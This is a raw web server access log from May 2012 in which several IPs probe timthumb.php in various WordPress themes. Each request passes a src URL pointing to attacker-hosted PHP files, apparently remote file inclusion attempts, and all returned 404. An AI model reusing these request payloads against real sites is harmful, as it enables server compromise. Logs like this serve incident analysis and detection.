90.198.87.118 - - [14/May/2012:06:20:20 +0200] "GET /stats//wp-content/themes/object/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:06:20:22 +0200] "GET //wp-content/themes/object/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:06:20:23 +0200] "GET //wp-content/themes/object/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:06:20:31 +0200] "GET /stats//wp-content/themes/OnThego/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
85.238.107.233 - - [14/May/2012:06:20:31 +0200] "GET /stats/wp-content/themes/ePhoto/timthumb.php?src=http://wordpress.company.draadrianacampos.com.br/2.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.238.107.233 - - [14/May/2012:06:20:31 +0200] "GET /wp-content/themes/ePhoto/timthumb.php?src=http://wordpress.company.draadrianacampos.com.br/2.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
90.198.87.118 - - [14/May/2012:06:20:32 +0200] "GET /stats//wp-content/themes/OnThego/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
72.10.49.128 - - [14/May/2012:06:20:33 +0200] "GET /stats/wp-content/themes/ePhoto/timthumb.php?src=http://blogger.community.transpackchile.com/2.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.10.49.128 - - [14/May/2012:06:20:33 +0200] "GET /wp-content/themes/ePhoto/timthumb.php?src=http://blogger.community.transpackchile.com/2.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
